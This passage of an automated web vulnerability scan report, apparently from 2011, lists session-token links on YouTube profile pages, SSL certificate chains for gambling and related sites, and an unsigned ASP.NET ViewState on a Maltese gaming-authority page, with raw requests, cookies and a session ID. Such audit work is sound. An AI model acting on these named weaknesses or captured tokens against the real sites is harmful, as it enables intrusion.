Confidence:   Firm
Host:   http://www.youtube.com
Path:   /user/PostcodeLottery

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /user/PostcodeLottery HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:58:44 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: VISITOR_INFO1_LIVE=QPD6waz_a-Y; path=/; domain=.youtube.com; expires=Wed, 11-Jan-2012 11:58:44 GMT
Set-Cookie: GEO=dfb55d2f94c5feeb036cbf6d295ddc27cwsAAAAzVVOtwdbzTdERdA==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en" dir="ltr" xmlns:og="http://opengraphprotocol.org/schema/">
<!-- machid: sd1dXU2oteFNMSkZHd0ZhX1FzYkZzMDNQRDJkMTVDSU9HTmxZTk9ITmZXNkRwNGt2blpXSDdB -->
<head>



...[SNIP]...
<link rel="canonical" href="/user/PostcodeLottery">
<link rel="alternate" media="handheld" href="http://m.youtube.com/profile?desktop_uri=%2Fuser%2FPostcodeLottery&amp;sort=p&amp;channel_id=0&amp;livestreaming_tutorial=False&amp;ytsession=%7B%7D&amp;start=0&amp;user=PostcodeLottery&amp;autoplay=True&amp;gl=US">
<meta name="title" content="The People&#39;s Postcode Lottery">
...[SNIP]...
</style>

<link rel="alternate" media="handheld" href="http://m.youtube.com/profile?desktop_uri=%2Fuser%2FPostcodeLottery&amp;sort=p&amp;channel_id=0&amp;livestreaming_tutorial=False&amp;ytsession=%7B%7D&amp;start=0&amp;user=PostcodeLottery&amp;autoplay=True&amp;gl=US">

<link rel="alternate" type="application/rss+xml" title="RSS" href="http://gdata.youtube.com/feeds/base/users/PostcodeLottery/uploads?alt=rss&amp;v=2&amp;orderby=published&amp;client=ytapi-youtube
...[SNIP]...

8.6. http://www.youtube.com/user/primescratchcards1

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.youtube.com
Path:   /user/primescratchcards1

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /user/primescratchcards1 HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 11:58:46 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: VISITOR_INFO1_LIVE=o7D5C2X2FIw; path=/; domain=.youtube.com; expires=Wed, 11-Jan-2012 11:58:46 GMT
Set-Cookie: GEO=8d3458027bf69c9d59b40211c24404e3cwsAAAAzVVOtwdbzTdERdg==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en" dir="ltr" xmlns:og="http://opengraphprotocol.org/schema/">
<!-- machid: sWkFSZzctYUFHdmh6U2NNLTZ0UURUcHA1MXdfYjVEQnNxaTVWdFFmSDE4WmcwTG5va3VETmVn -->
<head>



...[SNIP]...
<link rel="canonical" href="/user/primescratchcards1">
<link rel="alternate" media="handheld" href="http://m.youtube.com/profile?desktop_uri=%2Fuser%2Fprimescratchcards1&amp;sort=p&amp;channel_id=0&amp;livestreaming_tutorial=False&amp;ytsession=%7B%7D&amp;start=0&amp;user=primescratchcards1&amp;autoplay=True&amp;gl=US">
<meta name="title" content="">
...[SNIP]...
</style>

<link rel="alternate" media="handheld" href="http://m.youtube.com/profile?desktop_uri=%2Fuser%2Fprimescratchcards1&amp;sort=p&amp;channel_id=0&amp;livestreaming_tutorial=False&amp;ytsession=%7B%7D&amp;start=0&amp;user=primescratchcards1&amp;autoplay=True&amp;gl=US">

<link rel="alternate" type="application/rss+xml" title="RSS" href="http://gdata.youtube.com/feeds/base/users/primescratchcards1/uploads?alt=rss&amp;v=2&amp;orderby=published&amp;client=ytapi-yout
...[SNIP]...

9. SSL certificate
There are 25 instances of this issue:

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.



9.1. https://clicktale.pantherssl.com/

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://clicktale.pantherssl.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:

The server presented the following certificates:

Server certificate

Issued to:  *.pantherssl.com
Issued by:  DigiCert High Assurance CA-3
Valid from:  Wed Oct 27 19:00:00 CDT 2010
Valid to:  Tue Dec 11 17:59:59 CST 2012

Certificate chain #1

Issued to:  DigiCert High Assurance CA-3
Issued by:  DigiCert High Assurance EV Root CA
Valid from:  Mon Apr 02 19:00:00 CDT 2007
Valid to:  Sat Apr 02 19:00:00 CDT 2022

Certificate chain #2

Issued to:  DigiCert High Assurance EV Root CA
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Sun Oct 01 00:00:00 CDT 2006
Valid to:  Sat Jul 26 13:15:15 CDT 2014

Certificate chain #3

Issued to:  Entrust.net Secure Server Certification Authority
Issued by:  Entrust.net Secure Server Certification Authority
Valid from:  Tue May 25 11:09:40 CDT 1999
Valid to:  Sat May 25 11:39:40 CDT 2019

9.2. https://www.aspireaffiliates.com/

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://www.aspireaffiliates.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:

The server presented the following certificates:

Server certificate

Issued to:  aspireaffiliates.com
Issued by:  Go Daddy Secure Certification Authority
Valid from:  Wed Jan 12 05:35:30 CST 2011
Valid to:  Thu Jan 12 05:35:30 CST 2012

Certificate chain #1

Issued to:  Go Daddy Secure Certification Authority
Issued by:  Go Daddy Class 2 Certification Authority
Valid from:  Wed Nov 15 19:54:37 CST 2006
Valid to:  Sun Nov 15 19:54:37 CST 2026

Certificate chain #2

Issued to:  Go Daddy Class 2 Certification Authority
Issued by:  http://www.valicert.com/
Valid from:  Tue Jun 29 12:06:20 CDT 2004
Valid to:  Sat Jun 29 12:06:20 CDT 2024

Certificate chain #3

Issued to:  http://www.valicert.com/
Issued by:  http://www.valicert.com/
Valid from:  Fri Jun 25 19:19:54 CDT 1999
Valid to:  Tue Jun 25 19:19:54 CDT 2019

9.3. https://www.thawte.com/

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://www.thawte.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:

The server presented the following certificates:

Server certificate

Issued to:  www.thawte.com
Issued by:  thawte Extended Validation SSL CA
Valid from:  Tue Nov 10 18:00:00 CST 2009
Valid to:  Fri Nov 11 17:59:59 CST 2011

Certificate chain #1

Issued to:  thawte Primary Root CA
Issued by:  Thawte Premium Server CA
Valid from:  Thu Nov 16 18:00:00 CST 2006
Valid to:  Wed Dec 30 17:59:59 CST 2020

Certificate chain #2

Issued to:  thawte Extended Validation SSL CA
Issued by:  thawte Primary Root CA
Valid from:  Thu Nov 16 18:00:00 CST 2006
Valid to:  Wed Nov 16 17:59:59 CST 2016

Certificate chain #3

Issued to:  thawte Primary Root CA
Issued by:  thawte Primary Root CA
Valid from:  Thu Nov 16 18:00:00 CST 2006
Valid to:  Wed Jul 16 18:59:59 CDT 2036

9.4. https://help.betsson.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   https://help.betsson.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:

The server presented the following certificates:

Server certificate

Issued to:  *.betsson.com
Issued by:  UTN - DATACorp SGC
Valid from:  Mon Apr 27 19:00:00 CDT 2009
Valid to:  Thu Apr 28 18:59:59 CDT 2011

Certificate chain #1

Issued to:  UTN - DATACorp SGC
Issued by:  UTN - DATACorp SGC
Valid from:  Thu Jun 24 13:57:21 CDT 1999
Valid to:  Mon Jun 24 14:06:30 CDT 2019

9.5. https://bingo.betsson.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://bingo.betsson.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.betsson.com
Issued by:  COMODO High-Assurance Secure Server CA
Valid from:  Sun Apr 17 19:00:00 CDT 2011
Valid to:  Sun Apr 27 18:59:59 CDT 2014

Certificate chain #1

Issued to:  COMODO High-Assurance Secure Server CA
Issued by:  AddTrust External CA Root
Valid from:  Thu Apr 15 19:00:00 CDT 2010
Valid to:  Sat May 30 05:48:38 CDT 2020

Certificate chain #2

Issued to:  AddTrust External CA Root
Issued by:  AddTrust External CA Root
Valid from:  Tue May 30 05:48:38 CDT 2000
Valid to:  Sat May 30 05:48:38 CDT 2020

Certificate chain #3

Issued to:  AddTrust External CA Root
Issued by:  AddTrust External CA Root
Valid from:  Tue May 30 05:48:38 CDT 2000
Valid to:  Sat May 30 05:48:38 CDT 2020

9.6. https://ble.hs.llnwd.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ble.hs.llnwd.net
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.hs.llnwd.net
Issued by:  Equifax Secure Certificate Authority
Valid from:  Mon Jun 15 09:39:34 CDT 2009
Valid to:  Sun Sep 16 01:17:48 CDT 2012

Certificate chain #1

Issued to:  Equifax Secure Certificate Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sat Aug 22 11:41:51 CDT 1998
Valid to:  Wed Aug 22 11:41:51 CDT 2018

Certificate chain #2

Issued to:  Equifax Secure Certificate Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sat Aug 22 11:41:51 CDT 1998
Valid to:  Wed Aug 22 11:41:51 CDT 2018

9.7. https://casino.betsson.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://casino.betsson.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.betsson.com
Issued by:  COMODO High-Assurance Secure Server CA
Valid from:  Sun Apr 17 19:00:00 CDT 2011
Valid to:  Sun Apr 27 18:59:59 CDT 2014

Certificate chain #1

Issued to:  COMODO High-Assurance Secure Server CA
Issued by:  AddTrust External CA Root
Valid from:  Thu Apr 15 19:00:00 CDT 2010
Valid to:  Sat May 30 05:48:38 CDT 2020

Certificate chain #2

Issued to:  AddTrust External CA Root
Issued by:  AddTrust External CA Root
Valid from:  Tue May 30 05:48:38 CDT 2000
Valid to:  Sat May 30 05:48:38 CDT 2020

Certificate chain #3

Issued to:  AddTrust External CA Root
Issued by:  AddTrust External CA Root
Valid from:  Tue May 30 05:48:38 CDT 2000
Valid to:  Sat May 30 05:48:38 CDT 2020

9.8. https://download.macromedia.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://download.macromedia.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  download.macromedia.com,ST=California
Issued by:  Akamai Subordinate CA 3
Valid from:  Tue Apr 19 10:37:25 CDT 2011
Valid to:  Thu Apr 19 10:37:25 CDT 2012

Certificate chain #1

Issued to:  Akamai Subordinate CA 3
Issued by:  GTE CyberTrust Global Root
Valid from:  Thu May 11 10:32:00 CDT 2006
Valid to:  Sat May 11 18:59:00 CDT 2013

Certificate chain #2

Issued to:  GTE CyberTrust Global Root
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Aug 12 19:29:00 CDT 1998
Valid to:  Mon Aug 13 18:59:00 CDT 2018

9.9. https://download.neogames-tech.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://download.neogames-tech.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  download.neogames-tech.com
Issued by:  Thawte Server CA
Valid from:  Mon Apr 05 19:00:00 CDT 2010
Valid to:  Sun May 06 18:59:59 CDT 2012

Certificate chain #1

Issued to:  Thawte Server CA
Issued by:  Thawte Server CA
Valid from:  Wed Jul 31 19:00:00 CDT 1996
Valid to:  Fri Jan 01 17:59:59 CST 2021

9.10. https://games.betsson.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://games.betsson.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.betsson.com
Issued by:  COMODO High-Assurance Secure Server CA
Valid from:  Sun Apr 17 19:00:00 CDT 2011
Valid to:  Sun Apr 27 18:59:59 CDT 2014

Certificate chain #1

Issued to:  COMODO High-Assurance Secure Server CA
Issued by:  AddTrust External CA Root
Valid from:  Thu Apr 15 19:00:00 CDT 2010
Valid to:  Sat May 30 05:48:38 CDT 2020

Certificate chain #2

Issued to:  AddTrust External CA Root
Issued by:  AddTrust External CA Root
Valid from:  Tue May 30 05:48:38 CDT 2000
Valid to:  Sat May 30 05:48:38 CDT 2020

Certificate chain #3

Issued to:  AddTrust External CA Root
Issued by:  AddTrust External CA Root
Valid from:  Tue May 30 05:48:38 CDT 2000
Valid to:  Sat May 30 05:48:38 CDT 2020

9.11. https://in.getclicky.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://in.getclicky.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.getclicky.com
Issued by:  Go Daddy Secure Certification Authority
Valid from:  Mon Aug 09 18:49:23 CDT 2010
Valid to:  Sun Aug 09 18:49:23 CDT 2015

Certificate chain #1

Issued to:  Go Daddy Secure Certification Authority
Issued by:  Go Daddy Class 2 Certification Authority
Valid from:  Wed Nov 15 19:54:37 CST 2006
Valid to:  Sun Nov 15 19:54:37 CST 2026

Certificate chain #2

Issued to:  Go Daddy Class 2 Certification Authority
Issued by:  http://www.valicert.com/
Valid from:  Tue Jun 29 12:06:20 CDT 2004
Valid to:  Sat Jun 29 12:06:20 CDT 2024

Certificate chain #3

Issued to:  http://www.valicert.com/
Issued by:  http://www.valicert.com/
Valid from:  Fri Jun 25 19:19:54 CDT 1999
Valid to:  Tue Jun 25 19:19:54 CDT 2019

Certificate chain #4

Issued to:  http://www.valicert.com/
Issued by:  http://www.valicert.com/
Valid from:  Fri Jun 25 19:19:54 CDT 1999
Valid to:  Tue Jun 25 19:19:54 CDT 2019

9.12. https://livecasino.betsson.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://livecasino.betsson.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.betsson.com
Issued by:  COMODO High-Assurance Secure Server CA
Valid from:  Sun Apr 17 19:00:00 CDT 2011
Valid to:  Sun Apr 27 18:59:59 CDT 2014

Certificate chain #1

Issued to:  COMODO High-Assurance Secure Server CA
Issued by:  AddTrust External CA Root
Valid from:  Thu Apr 15 19:00:00 CDT 2010
Valid to:  Sat May 30 05:48:38 CDT 2020

Certificate chain #2

Issued to:  AddTrust External CA Root
Issued by:  AddTrust External CA Root
Valid from:  Tue May 30 05:48:38 CDT 2000
Valid to:  Sat May 30 05:48:38 CDT 2020

Certificate chain #3

Issued to:  AddTrust External CA Root
Issued by:  AddTrust External CA Root
Valid from:  Tue May 30 05:48:38 CDT 2000
Valid to:  Sat May 30 05:48:38 CDT 2020

9.13. https://members.bet365.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://members.bet365.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  members.bet365.com
Issued by:  Thawte SSL CA
Valid from:  Sun Nov 14 18:00:00 CST 2010
Valid to:  Thu Nov 14 17:59:59 CST 2013

Certificate chain #1

Issued to:  Thawte SSL CA
Issued by:  thawte Primary Root CA
Valid from:  Sun Feb 07 18:00:00 CST 2010
Valid to:  Fri Feb 07 17:59:59 CST 2020

Certificate chain #2

Issued to:  thawte Primary Root CA
Issued by:  thawte Primary Root CA
Valid from:  Thu Nov 16 18:00:00 CST 2006
Valid to:  Wed Jul 16 18:59:59 CDT 2036

9.14. https://poker.betsson.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://poker.betsson.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.betsson.com
Issued by:  COMODO High-Assurance Secure Server CA
Valid from:  Sun Apr 17 19:00:00 CDT 2011
Valid to:  Sun Apr 27 18:59:59 CDT 2014

Certificate chain #1

Issued to:  COMODO High-Assurance Secure Server CA
Issued by:  AddTrust External CA Root
Valid from:  Thu Apr 15 19:00:00 CDT 2010
Valid to:  Sat May 30 05:48:38 CDT 2020

Certificate chain #2

Issued to:  AddTrust External CA Root
Issued by:  AddTrust External CA Root
Valid from:  Tue May 30 05:48:38 CDT 2000
Valid to:  Sat May 30 05:48:38 CDT 2020

Certificate chain #3

Issued to:  AddTrust External CA Root
Issued by:  AddTrust External CA Root
Valid from:  Tue May 30 05:48:38 CDT 2000
Valid to:  Sat May 30 05:48:38 CDT 2020

9.15. https://scratch.betsson.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://scratch.betsson.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.betsson.com
Issued by:  COMODO High-Assurance Secure Server CA
Valid from:  Sun Apr 17 19:00:00 CDT 2011
Valid to:  Sun Apr 27 18:59:59 CDT 2014

Certificate chain #1

Issued to:  COMODO High-Assurance Secure Server CA
Issued by:  AddTrust External CA Root
Valid from:  Thu Apr 15 19:00:00 CDT 2010
Valid to:  Sat May 30 05:48:38 CDT 2020

Certificate chain #2

Issued to:  AddTrust External CA Root
Issued by:  AddTrust External CA Root
Valid from:  Tue May 30 05:48:38 CDT 2000
Valid to:  Sat May 30 05:48:38 CDT 2020

Certificate chain #3

Issued to:  AddTrust External CA Root
Issued by:  AddTrust External CA Root
Valid from:  Tue May 30 05:48:38 CDT 2000
Valid to:  Sat May 30 05:48:38 CDT 2020

9.16. https://seal.verisign.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://seal.verisign.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  seal.verisign.com
Issued by:  VeriSign Class 3 Secure Server CA - G2
Valid from:  Tue Jul 06 19:00:00 CDT 2010
Valid to:  Sun Jul 06 18:59:59 CDT 2014

Certificate chain #1

Issued to:  VeriSign Class 3 Secure Server CA - G2
Issued by:  VeriSign Trust Network
Valid from:  Tue Mar 24 19:00:00 CDT 2009
Valid to:  Sun Mar 24 18:59:59 CDT 2019

Certificate chain #2

Issued to:  VeriSign Trust Network
Issued by:  VeriSign Trust Network
Valid from:  Sun May 17 19:00:00 CDT 1998
Valid to:  Tue Aug 01 18:59:59 CDT 2028

Certificate chain #3

Issued to:  VeriSign Trust Network
Issued by:  VeriSign Trust Network
Valid from:  Sun May 17 19:00:00 CDT 1998
Valid to:  Tue Aug 01 18:59:59 CDT 2028

9.17. https://sealinfo.verisign.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://sealinfo.verisign.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  sealinfo.verisign.com
Issued by:  VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:  Mon Mar 22 19:00:00 CDT 2010
Valid to:  Thu Mar 22 18:59:59 CDT 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

9.18. https://secure.neogames-tech.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.neogames-tech.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  secure.neogames-tech.com
Issued by:  VeriSign Class 3 Secure Server CA - G3
Valid from:  Mon Nov 01 19:00:00 CDT 2010
Valid to:  Sat Dec 01 17:59:59 CST 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Secure Server CA - G3
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Sun Feb 07 18:00:00 CST 2010
Valid to:  Fri Feb 07 17:59:59 CST 2020

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

9.19. https://static.getclicky.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://static.getclicky.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.getclicky.com
Issued by:  Go Daddy Secure Certification Authority
Valid from:  Mon Aug 09 18:49:23 CDT 2010
Valid to:  Sun Aug 09 18:49:23 CDT 2015

Certificate chain #1

Issued to:  Go Daddy Secure Certification Authority
Issued by:  Go Daddy Class 2 Certification Authority
Valid from:  Wed Nov 15 19:54:37 CST 2006
Valid to:  Sun Nov 15 19:54:37 CST 2026

Certificate chain #2

Issued to:  Go Daddy Class 2 Certification Authority
Issued by:  http://www.valicert.com/
Valid from:  Tue Jun 29 12:06:20 CDT 2004
Valid to:  Sat Jun 29 12:06:20 CDT 2024

Certificate chain #3

Issued to:  http://www.valicert.com/
Issued by:  http://www.valicert.com/
Valid from:  Fri Jun 25 19:19:54 CDT 1999
Valid to:  Tue Jun 25 19:19:54 CDT 2019

Certificate chain #4

Issued to:  http://www.valicert.com/
Issued by:  http://www.valicert.com/
Valid from:  Fri Jun 25 19:19:54 CDT 1999
Valid to:  Tue Jun 25 19:19:54 CDT 2019

9.20. https://www.betsson.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.betsson.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.betsson.com
Issued by:  VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:  Tue Apr 06 19:00:00 CDT 2010
Valid to:  Fri Apr 06 18:59:59 CDT 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Wed Jul 16 18:59:59 CDT 2036

9.21. https://www.interwetten.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.interwetten.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.interwetten.com
Issued by:  Thawte Premium Server CA
Valid from:  Tue Jan 12 18:00:00 CST 2010
Valid to:  Fri Apr 13 18:59:59 CDT 2012

Certificate chain #1

Issued to:  Thawte Premium Server CA
Issued by:  Thawte Premium Server CA
Valid from:  Wed Jul 31 19:00:00 CDT 1996
Valid to:  Fri Jan 01 17:59:59 CST 2021

9.22. https://www.macromedia.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.macromedia.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.macromedia.com
Issued by:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Valid from:  Wed Dec 09 18:00:00 CST 2009
Valid to:  Sat Dec 10 17:59:59 CST 2011

Certificate chain #1

Issued to:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Wed Apr 16 19:00:00 CDT 1997
Valid to:  Mon Oct 24 18:59:59 CDT 2011

Certificate chain #2

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

9.23. https://www.neogamespartners.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.neogamespartners.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.neogamespartners.com
Issued by:  Go Daddy Secure Certification Authority
Valid from:  Thu Feb 10 03:39:51 CST 2011
Valid to:  Fri Mar 23 02:34:49 CDT 2012

Certificate chain #1

Issued to:  Go Daddy Secure Certification Authority
Issued by:  Go Daddy Class 2 Certification Authority
Valid from:  Wed Nov 15 19:54:37 CST 2006
Valid to:  Sun Nov 15 19:54:37 CST 2026

Certificate chain #2

Issued to:  Go Daddy Class 2 Certification Authority
Issued by:  http://www.valicert.com/
Valid from:  Tue Jun 29 12:06:20 CDT 2004
Valid to:  Sat Jun 29 12:06:20 CDT 2024

Certificate chain #3

Issued to:  http://www.valicert.com/
Issued by:  http://www.valicert.com/
Valid from:  Fri Jun 25 19:19:54 CDT 1999
Valid to:  Tue Jun 25 19:19:54 CDT 2019

9.24. https://www.norskelodd.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.norskelodd.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.norskelodd.com
Issued by:  UTN - DATACorp SGC
Valid from:  Thu Sep 16 19:00:00 CDT 2010
Valid to:  Mon Sep 16 18:59:59 CDT 2013

Certificate chain #1

Issued to:  UTN - DATACorp SGC
Issued by:  UTN - DATACorp SGC
Valid from:  Thu Jun 24 13:57:21 CDT 1999
Valid to:  Mon Jun 24 14:06:30 CDT 2019

9.25. https://www.postcodelottery.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.postcodelottery.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.postcodelottery.com
Issued by:  Thawte Premium Server CA
Valid from:  Tue Aug 05 19:00:00 CDT 2008
Valid to:  Sat Aug 06 18:59:59 CDT 2011

Certificate chain #1

Issued to:  Thawte Premium Server CA
Issued by:  Thawte Premium Server CA
Valid from:  Wed Jul 31 19:00:00 CDT 1996
Valid to:  Fri Jan 01 17:59:59 CST 2021

10. ASP.NET ViewState without MAC enabled
There are 2 instances of this issue:

Issue description

The ViewState is a mechanism built into the ASP.NET platform for persisting elements of the user interface and other data across successive requests. The data to be persisted is serialised by the server and transmitted via a hidden form field. When it is POSTed back to the server, the ViewState parameter is deserialised and the data is retrieved.

By default, the serialised value is signed by the server to prevent tampering by the user; however, this behaviour can be disabled by setting the Page.EnableViewStateMac property to false. If this is done, then an attacker can modify the contents of the ViewState and cause arbitrary data to be deserialised and processed by the server. If the ViewState contains any items that are critical to the server's processing of the request, then this may result in a security exposure.

You should review the contents of the deserialised ViewState to determine whether it contains any critical items that can be manipulated to attack the application.

Issue remediation

There is no good reason to disable the default ASP.NET behaviour in which the ViewState is signed to prevent tampering. To ensure that this occurs, you should set the Page.EnableViewStateMac property to true on any pages where the ViewState is not currently signed.


10.1. http://www.lga.org.mt/lga/content.aspx

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.lga.org.mt
Path:   /lga/content.aspx

Request

GET /lga/content.aspx?id=109045 HTTP/1.1
Host: www.lga.org.mt
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 11:46:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: ASP.NET_SessionId=kpe2x045cuhwf145d5bbn545; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 14976


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML>
   <HEAD>
       <title>LGA ::
           Licensed Operators: Class 4
       </title>
       <meta content=
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" value="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" />
...[SNIP]...

